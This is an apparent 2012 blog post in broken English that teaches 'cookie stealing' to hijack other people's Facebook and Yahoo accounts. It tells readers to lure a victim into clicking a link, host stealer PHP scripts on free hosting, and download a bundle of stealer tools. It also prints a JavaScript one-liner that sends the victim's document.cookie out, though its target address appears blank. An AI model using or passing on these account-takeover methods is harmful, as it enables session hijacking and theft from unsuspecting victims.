Best Cookies Stealing

 on Jumat, 07 Desember 2012  

Whatt are cookies?

Cookies r basically strings by which a website remember you your PC ect.
When u login to any web then web server will make some cookies
And web server will remember u by your cookies

Cookies stealing is a way by which u can hack any account with out knowing user name and password u hv 2 send a link to your victim when he click your link he will get a  image or PHP script and this script will
give u access to his account until victim get logout but in the case of yahoo cookies will deleted after 24 hours and u need to just refresh the page to get new cookies for you interesting

How we can steal cookies?
i knw 2 ways to steal cookies most ppls ask me ab8 this method but today
i m giving u many use full scripts by these script u can hack ppls download scripts from here
this zip file include IP stealer  script one facebook cookiesstealing script one cookies stealing script and most important yahoo cookiesstealer script
 1st of all i will tell u ab8 yahoo cookies stealing u will get an rar file in that file you will get 5 more files upload  them on some free hosting sites then create a directory with the name cookies and send this java script to ur victim javascript:document.location=''.concat(escape(document.cookie));
 ok download another script from here  tut is  also in it hope u will enjoy
u can also get this tut

Best Cookies Stealing 4.5 5 Unknown Jumat, 07 Desember 2012 Whatt are cookies? Cookies r basically strings by which a website remember you your PC ect. When u login to any web then web server will mak...

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